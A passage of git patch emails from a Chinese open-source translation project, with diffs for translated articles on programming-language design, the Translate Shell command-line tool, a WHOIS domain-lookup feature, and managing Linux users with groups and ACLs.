PYPL 指数上它的成就也比 Go 差很多。 -## 五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 -## 在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 - - + -最合理的语言工程模式 + -============================================================ + - + -当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。 + - + -对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 + - + -在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。 + - + -在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 + - + -现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? + - + -所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 + - + -在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 + - + -如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 + - + -这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 + - + -在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 + - + -当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! + - + -相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 + - + -C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 + - + -另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 + - + -今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 + - + -即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 + - + -我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 + - + -这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 + - + -当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。 + - + -五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 + - + -在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 + - + --------------------------------------------------------------------------------- + - + -via: http://esr.ibiblio.org/?p=7745 + - + -作者:[Eric Raymond ][a] + -译者:[Valoniakim](https://github.com/Valoniakim) + -校对:[校对者ID](https://github.com/校对者ID) + - + -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + - + -[a]:http://esr.ibiblio.org/?author=2 + -[1]:http://esr.ibiblio.org/?author=2 + -[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931 + -[3]:http://esr.ibiblio.org/?p=7745 From 1f9edc7325ab04fc87a6c4b35aff1fa5dbe90e24 Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Mon, 4 Dec 2017 20:40:38 +0800 Subject: [PATCH 0241/1627] Rename Language engineering for great justice. to 20171118 Language engineering for great justice. --- ... justice. => 20171118 Language engineering for great justice.} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/tech/{Language engineering for great justice. => 20171118 Language engineering for great justice.} (100%) diff --git a/translated/tech/Language engineering for great justice. b/translated/tech/20171118 Language engineering for great justice. similarity index 100% rename from translated/tech/Language engineering for great justice. rename to translated/tech/20171118 Language engineering for great justice. From b1848c52a3a76ad92f3f6dbe17a88ddfb4659d14 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 21:38:41 +0800 Subject: [PATCH 0242/1627] =?UTF-8?q?PRF:20171130=20Translate=20Shell=20?= =?UTF-8?q?=E2=80=93=20A=20Tool=20To=20Use=20Google=20Translate=20From=20C?= =?UTF-8?q?ommand=20Line=20In=20Linux.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @lujun9972 译者没署名,我找了半天 /cry --- ...ogle Translate From Command Line In Linux.md | 76 +++++++++---------- 1 file changed, 37 insertions(+), 39 deletions(-) diff --git a/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md b/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md index 9f905bd496..aeae003532 100644 --- a/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md +++ b/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md @@ -1,68 +1,65 @@ -Translate Shell: 一款在 Linux 命令行中使用 Google Translate的工具 +Translate Shell :一款在 Linux 命令行中使用谷歌翻译的工具 ============================================================ -我对 CLI 应用非常感兴趣,因此热衷于使用并分享 CLI 应用。 我之所以更喜欢 CLI 很大原因是因为我在大多数的时候都使用的是字符界面(black screen),已经习惯了使用 CLI 应用而不是 GUI 应用. +我对 CLI 应用非常感兴趣,因此热衷于使用并分享 CLI 应用。 我之所以更喜欢 CLI 很大原因是因为我在大多数的时候都使用的是字符界面(black screen),已经习惯了使用 CLI 应用而不是 GUI 应用。 -我写过很多关于 CLI 应用的文章。 最近我发现了一些 google 的 CLI 工具,像 “Google Translator”, “Google Calendar”, 和 “Google Contacts”。 这里,我想在给大家分享一下。 +我写过很多关于 CLI 应用的文章。 最近我发现了一些谷歌的 CLI 工具,像 “Google Translator”、“Google Calendar” 和 “Google Contacts”。 这里,我想在给大家分享一下。 -今天我们要介绍的是 “Google Translator” 工具。 由于母语是泰米尔语,我在一天内用了很多次才理解了它的意义。 +今天我们要介绍的是 “Google Translator” 工具。 由于我的母语是泰米尔语,我在一天内用了很多次才理解了它的意义。 -`Google translate` 为其他语系的人们所广泛使用。 +谷歌翻译为其它语系的人们所广泛使用。 ### 什么是 Translate Shell -[Translate Shell][2] (之前叫做 Google Translate CLI) 是一款借助 `Google Translate`(默认), `Bing Translator`, `Yandex.Translate` 以及 `Apertium` 来翻译的命令行翻译器。 -它让你可以在终端访问这些翻译引擎. `Translate Shell` 在大多数Linux发行版中都能使用。 +[Translate Shell][2] (之前叫做 Google Translate CLI) 是一款借助谷歌翻译(默认)、必应翻译、Yandex.Translate 以及 Apertium 来翻译的命令行翻译器。它让你可以在终端访问这些翻译引擎。 Translate Shell 在大多数 Linux 发行版中都能使用。 ### 如何安装 Translate Shell -有三种方法安装 `Translate Shell`。 +有三种方法安装 Translate Shell。 * 下载自包含的可执行文件 - * 手工安装 +* 通过包管理器安装 -* 通过包挂力气安装 - -#### 方法-1 : 下载自包含的可执行文件 +#### 方法 1 : 下载自包含的可执行文件 下载自包含的可执行文件放到 `/usr/bin` 目录中。 -```shell +``` $ wget git.io/trans $ chmod +x ./trans $ sudo mv trans /usr/bin/ ``` -#### 方法-2 : 手工安装 +#### 方法 2 : 手工安装 -克隆 `Translate Shell` github 仓库然后手工编译。 +克隆 Translate Shell 的 GitHub 仓库然后手工编译。 -```shell +``` $ git clone https://github.com/soimort/translate-shell && cd translate-shell $ make $ sudo make install ``` -#### 方法-3 : Via Package Manager +#### 方法 3 : 通过包管理器 -有些发行版的官方仓库中包含了 `Translate Shell`,可以通过包管理器来安装。 +有些发行版的官方仓库中包含了 Translate Shell,可以通过包管理器来安装。 -对于 Debian/Ubuntu, 使用 [APT-GET Command][3] 或者 [APT Command][4]来安装。 +对于 Debian/Ubuntu, 使用 [APT-GET 命令][3] 或者 [APT 命令][4]来安装。 -```shell +``` $ sudo apt-get install translate-shell ``` -对于 Fedora, 使用 [DNF Command][5] 来安装。 +对于 Fedora, 使用 [DNF 命令][5] 来安装。 -```shell +``` $ sudo dnf install translate-shell ``` -对于基于 Arch Linux 的系统, 使用 [Yaourt Command][6] 或 [Packer Command][7] 来从 AUR 仓库中安装。 +对于基于 Arch Linux 的系统, 使用 [Yaourt 命令][6] 或 [Packer 明快][7] 来从 AUR 仓库中安装。 -```shell +``` $ yaourt -S translate-shell or $ packer -S translate-shell @@ -70,7 +67,7 @@ $ packer -S translate-shell ### 如何使用 Translate Shell -安装好后,打开终端闭关输入下面命令。 `Google Translate` 会自动探测源文本是哪种语言,并且在默认情况下将之翻译成你的 `locale` 所对应的语言。 +安装好后,打开终端闭关输入下面命令。 谷歌翻译会自动探测源文本是哪种语言,并且在默认情况下将之翻译成你的 `locale` 所对应的语言。 ``` $ trans [Words] @@ -119,7 +116,7 @@ thanks நன்றி ``` -要将一个单词翻译到多个语种可以使用下面命令(本例中, 我将单词翻译成泰米尔语以及印地语)。 +要将一个单词翻译到多个语种可以使用下面命令(本例中,我将单词翻译成泰米尔语以及印地语)。 ``` $ trans :ta+hi thanks @@ -172,7 +169,7 @@ what is going on your life? உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? ``` -下面命令独立地翻译各个单词。 +下面命令单独地翻译各个单词。 ``` $ trans :ta curios happy @@ -208,14 +205,14 @@ happy சந்தோஷமாக, மகிழ்ச்சி, இனிய, சந்தோஷமா ``` -简洁模式: 默认情况下,`Translate Shell` 尽可能多的显示翻译信息. 如果你希望只显示简要信息,只需要加上`-b`选项。 +简洁模式:默认情况下,Translate Shell 尽可能多的显示翻译信息。如果你希望只显示简要信息,只需要加上 `-b`选项。 ``` $ trans -b :ta thanks நன்றி ``` -字典模式: 加上 `-d` 可以把 `Translate Shell` 当成字典来用. +字典模式:加上 `-d` 可以把 Translate Shell 当成字典来用。 ``` $ trans -d :en thanks @@ -294,14 +291,14 @@ See also Thanks!, thank, many thanks, thanks to, thanks to you, special thanks, give thanks, thousand thanks, Many thanks!, render thanks, heartfelt thanks, thanks to this ``` -使用下面格式可以使用 `Translate Shell` 来翻译文件。 +使用下面格式可以使用 Translate Shell 来翻译文件。 -```shell +``` $ trans :ta file:///home/magi/gtrans.txt உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? ``` -下面命令可以让 `Translate Shell` 进入交互模式. 在进入交互模式之前你需要明确指定源语言和目标语言。本例中,我将英文单词翻译成泰米尔语。 +下面命令可以让 Translate Shell 进入交互模式。 在进入交互模式之前你需要明确指定源语言和目标语言。本例中,我将英文单词翻译成泰米尔语。 ``` $ trans -shell en:ta thanks @@ -324,13 +321,14 @@ thanks நன்றி ``` -想知道语言代码,可以执行下面语言。 +想知道语言代码,可以执行下面命令。 -```shell +``` $ trans -R ``` 或者 -```shell + +``` $ trans -T ┌───────────────────────┬───────────────────────┬───────────────────────┐ │ Afrikaans - af │ Hindi - hi │ Punjabi - pa │ @@ -375,9 +373,9 @@ $ trans -T └───────────────────────┴───────────────────────┴───────────────────────┘ ``` -想了解更多选项的内容,可以查看 `man` 页. +想了解更多选项的内容,可以查看其 man 手册。 -```shell +``` $ man trans ``` @@ -386,8 +384,8 @@ $ man trans via: https://www.2daygeek.com/translate-shell-a-tool-to-use-google-translate-from-command-line-in-linux/ 作者:[Magesh Maruthamuthu][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) +译者:[lujun9972](https://github.com/lujun9972 ) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From a30b1c69ad66a0dcbc6e6cc67b6dffbe55e04c88 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 21:38:57 +0800 Subject: [PATCH 0243/1627] =?UTF-8?q?PUB:20171130=20Translate=20Shell=20?= =?UTF-8?q?=E2=80=93=20A=20Tool=20To=20Use=20Google=20Translate=20From=20C?= =?UTF-8?q?ommand=20Line=20In=20Linux.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @lujun9972 https://linux.cn/article-9107-1.html --- ...– A Tool To Use Google Translate From Command Line In Linux.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md (100%) diff --git a/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md b/published/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md similarity index 100% rename from translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md rename to published/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md From 8a5b20e9ad5362f9deb8f934fde1a0b37f82a1e0 Mon Sep 17 00:00:00 2001 From: iron0x <2727586680@qq.com> Date: Mon, 4 Dec 2017 21:40:05 +0800 Subject: [PATCH 0244/1627] Update 20171202 docker - Use multi-stage builds.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 翻译中 --- sources/tech/20171202 docker - Use multi-stage builds.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171202 docker - Use multi-stage builds.md b/sources/tech/20171202 docker - Use multi-stage builds.md index e1a6414862..8cc8af1c94 100644 --- a/sources/tech/20171202 docker - Use multi-stage builds.md +++ b/sources/tech/20171202 docker - Use multi-stage builds.md @@ -1,3 +1,5 @@ +【iron0x翻译中】 + Use multi-stage builds ============================================================ From 6d9411106201719c2a58e43176454b2b5f07062d Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 22:02:54 +0800 Subject: [PATCH 0245/1627] PRF&PUB:20171130 New Feature Find every domain someone owns automatically.md @geekpi --- ...d every domain someone owns automatically.md | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) rename {translated/tech => published}/20171130 New Feature Find every domain someone owns automatically.md (69%) diff --git a/translated/tech/20171130 New Feature Find every domain someone owns automatically.md b/published/20171130 New Feature Find every domain someone owns automatically.md similarity index 69% rename from translated/tech/20171130 New Feature Find every domain someone owns automatically.md rename to published/20171130 New Feature Find every domain someone owns automatically.md index 4b72eaae5e..e8866a5ce5 100644 --- a/translated/tech/20171130 New Feature Find every domain someone owns automatically.md +++ b/published/20171130 New Feature Find every domain someone owns automatically.md @@ -1,16 +1,15 @@ -新功能:自动找出每个域名的拥有者 +使用 DNSTrails 自动找出每个域名的拥有者 ============================================================ - 今天,我们很高兴地宣布我们最近几周做的新功能。它是 Whois 聚合工具,现在可以在 [DNSTrails][1] 上获得。 -在过去,查找一个域名的所有者会花费很多时间,因为大部分时间你都需要把域名指向一个 IP 地址,以便找到同一个人拥有的其他域名。 +在过去,查找一个域名的所有者会花费很多时间,因为大部分时间你都需要把域名翻译为一个 IP 地址,以便找到同一个人拥有的其他域名。 -使用老的方法,你会很轻易地在一个工具和另外一个工具的研究和交叉比较结果中花费数个小时,直到得到你想要的域名。 +使用老的方法,在得到你想要的域名列表之前,你在一个工具和另外一个工具的一日又一日的研究和交叉比较结果中经常会花费数个小时。 -感谢这个新工具和我们的智能[WHOIS 数据库][2],现在你可以搜索任何域名,并获得组织或个人注册的域名的完整列表,并在几秒钟内获得准确的结果。 +感谢这个新工具和我们的智能 [WHOIS 数据库][2],现在你可以搜索任何域名,并获得组织或个人注册的域名的完整列表,并在几秒钟内获得准确的结果。 -### 我如何使用Whois聚合功能? +### 我如何使用 Whois 聚合功能? 第一步:打开 [DNSTrails.com][3] @@ -28,15 +27,15 @@ 如果你正在调查互联网上任何个人的域名所有权,这意味着即使域名甚至没有指向注册服务商的 IP,如果他们使用相同的电话和邮件地址,我们仍然可以发现其他域名。 -想知道一个人拥有的其他域名么?亲自试试 [DNStrails][5] 的[ WHOIS 聚合功能][4]或者[使用我们的 API 访问][6]。 +想知道一个人拥有的其他域名么?亲自试试 [DNStrails][5] 的 [WHOIS 聚合功能][4]或者[使用我们的 API 访问][6]。 -------------------------------------------------------------------------------- via: https://securitytrails.com/blog/find-every-domain-someone-owns -作者:[SECURITYTRAILS TEAM ][a] +作者:[SECURITYTRAILS TEAM][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 40e85e02d0860ba5071128b76793eec19fefcbfd Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 22:08:09 +0800 Subject: [PATCH 0246/1627] =?UTF-8?q?=E4=BF=AE=E6=AD=A3=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E5=90=8D?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @oska874 @lujun9972 --- ...em.md => 20171117 System Logs Understand Your Linux System.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/tech/{20171117 System Logs: Understand Your Linux System.md => 20171117 System Logs Understand Your Linux System.md} (100%) diff --git a/translated/tech/20171117 System Logs: Understand Your Linux System.md b/translated/tech/20171117 System Logs Understand Your Linux System.md similarity index 100% rename from translated/tech/20171117 System Logs: Understand Your Linux System.md rename to translated/tech/20171117 System Logs Understand Your Linux System.md From ca2175631b518a9ee619aa0aea6727694b016cfe Mon Sep 17 00:00:00 2001 From: imquanquan Date: Mon, 4 Dec 2017 22:13:28 +0800 Subject: [PATCH 0247/1627] translated --- ...ow to Manage Users with Groups in Linux.md | 183 ++++++++++++++++++ 1 file changed, 183 insertions(+) create mode 100644 translated/tech/20171201 How to Manage Users with Groups in Linux.md diff --git a/translated/tech/20171201 How to Manage Users with Groups in Linux.md b/translated/tech/20171201 How to Manage Users with Groups in Linux.md new file mode 100644 index 0000000000..8baac8707b --- /dev/null +++ b/translated/tech/20171201 How to Manage Users with Groups in Linux.md @@ -0,0 +1,183 @@ +如何在 Linux 系统中用用户组来管理用户 +============================================================ + +### [group-of-people-1645356_1920.jpg][1] + +![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/group-of-people-1645356_1920.jpg?itok=rJlAxBSV) + +在本教程中了解如何通过用户组和访问控制表(ACL)来管理用户。 + +[创意共享协议][4] + +当你需要管理一台容纳多个用户的 Linux 机器时,比起一些基本的用户管理工具所提供的方法,有时候你需要对这些用户采取更多的用户权限管理方式。特别是当你要管理某些用户的权限时,这个想法尤为重要。比如说,你有一个目录,一个用户组中的用户可以通过读和写的权限访问这个目录,而其他用户组中的用户对这个目录只有读的权限。通过 Linux 这是完全可以实现的。但是你首先必须了解如何通过用户组和访问控制表(ACL)来管理用户。 + +我们将从简单的用户开始,逐渐深入到复杂的访问控制表(ACL)。你所需要做的一切都将在你选择的 Linux 发行版中完成。本文的重点是用户组,所以不会涉及到关于用户的基础知识。 + +为了达到演示的目的,我将假设: + +你需要用下面两个用户名新建两个用户: + +* olivia + +* nathan + +你需要新建以下两个用户组: + +* readers + +* editors + +olivia 属于 editors 用户组,而 nathan 属于 readers 用户组。reader 用户组对 ``/DATA`` 目录只有读的权限,而 editors 用户组则对 ``/DATA`` 目录同时有读和写的权限。当然,这是个非常小的任务,但它会给你基本的用法。你可以扩展这个任务以适应你其他更大的需求。 + +我将在 Ubuntu 16.04 Server 平台上进行演示。这些命令都是通用的,唯一不同的是,要是在你的发行版中不使用 sudo 命令,你必须切换到 root 用户来执行这些命令。 + +### 创建用户 + +我们需要做的第一件事是为我们的实验创建两个用户。可以用 ``useradd`` 命令来创建用户,我们不只是简单地创建一个用户,而需要同时创建用户和属于他们的家目录,然后给他们设置密码。 + +``` +sudo useradd -m olivia + +sudo useradd -m nathan +``` + +我们现在创建了两个用户,如果你看看 ``/home`` 目录,你可以发现他们的家目录(因为我们用了 -m 选项,可以帮在创建用户的同时创建他们的家目录。 + +之后,我们可以用以下命令给他们设置密码: + +``` +sudo passwd olivia + +sudo passwd nathan +``` + +就这样,我们创建了两个用户。 + +### 创建用户组并添加用户 + +现在我们将创建 readers 和 editors 用户组,然后给它们添加用户。创建用户组的命令是: + +``` +addgroup readers + +addgroup editors +``` + +(译者注:当你使用 CentOS 等一些 Linux 发行版时,可能系统没有 addgroup 这个命令,推荐使用 groupadd 命令来替换 addgroup 命令以达到同样的效果) + + +### [groups_1.jpg][2] + +![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/groups_1.jpg?itok=BKwL89BB) + +图一:我们可以使用刚创建的新用户组了。 + +[Used with permission][5] + +创建用户组后,我们需要给他们添加用户。我们用以下命令来将 nathan 添加到 readers 用户组: + +``` +sudo usermod -a -G readers nathan +``` +用以下命令将 olivia 添加到 editors 用户组: + +``` +sudo usermod -a -G editors olivia +``` + +现在我们已经准备好用用户组来管理用户了。 + +### 给用户组授予目录的权限 + +假设你有个目录 ``/READERS``,允许 readers 用户组的所有成员访问这个目录。首先,我们执行以下命令来更改目录所属用户组: + +``` +sudo chown -R :readers /READERS +``` + +接下来,执行以下命令收回目录所属用户组的写入权限: + +``` +sudo chmod -R g-w /READERS +``` + +然后我们执行下面的命令来收回其他用户对这个目录的访问权限(以防止任何不在读者组中的用户访问这个目录里的文件): + +``` +sudo chmod -R o-x /READERS +``` + +这时候,只有目录的所有者(root)和用户组 reader 中的用户可以访问 ``/READES`` 中的文件。 + +假设你有个目录 ``/EDITORS`` ,你需要给用户组 editors 里的成员这个目录的读和写的权限。为了达到这个目的,执行下面的这些命令是必要的: + +``` +sudo chown -R :editors /EDITORS + +sudo chmod -R g+w /EDITORS + +sudo chmod -R o-x /EDITORS +``` + +此时 editors 用户组的所有成员都可以访问和修改其中的文件。除此之外其他用户(除了 root 之外)无法访问 ``/EDITORS`` 中的任何文件。 + +使用这个方法的问题在于,你一次只能操作一个组和一个目录而已。这时候访问控制表(ACL)就可以派得上用场了。 + + +### 使用访问控制表(ACL) + +现在,让我们把这个问题变得棘手一点。假设你有一个目录 ``/DATA`` 并且你想给 readers 用户组的成员读取权限同时给 editors 用户组的成员读和写的权限。为此,你必须要用到 setfacl 命令。setfacl 命令可以为文件或文件夹设置一个访问控制表(ACL)。 + +这个命令的结构如下: + +``` +setfacl OPTION X:NAME:Y /DIRECTORY +``` + +其中 OPTION 是可选选项,X 可以是 u(用户)或者是 g (用户组),NAME 是用户或者用户组的名字,/DIRECTORY 是要用到的目录。我们将使用 -m 选项进行修改(modify)。因此,我们给 readers 用户组添加读取权限的命令是: + +``` +sudo setfacl -m g:readers:rx -R /DATA +``` + +现在 readers 用户组里面的每一个用户都可以读取 /DATA 目录里的文件了,但是他们不能修改里面的内容。 + +为了给 editors 用户组里面的用户读写权限,我们执行了以下的命令: + +``` +sudo setfacl -m g:editors:rwx -R /DATA +``` +上述命令将赋予 editors 用户组中的任何成员读取权限,同时保留 readers 用户组的只读权限。 + +### 更多的权限控制 + +使用访问控制表(ACL),你可以实现你所需的权限控制。你可以实现将用户添加到用户组,并且可靠灵活地控制这些用户组对每个目录的权限以达到你的需求。想要了解上述工具的更多信息,可以执行下列的命令: + +* man usradd + +* man addgroup + +* man usermod + +* man sefacl + +* man chown + +* man chmod + + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/12/how-manage-users-groups-linux + +作者:[Jack Wallen ] +译者:[imquanquan](https://github.com/imquanquan) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.linux.com/files/images/group-people-16453561920jpg +[2]:https://www.linux.com/files/images/groups1jpg +[3]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[4]:https://www.linux.com/licenses/category/creative-commons-zero +[5]:https://www.linux.com/licenses/category/used-permission From 96a54dd193bec2b9eb8bb945766b13087f101179 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 4 Dec 2017 22:20:54 +0800 Subject: [PATCH 0248/1627] 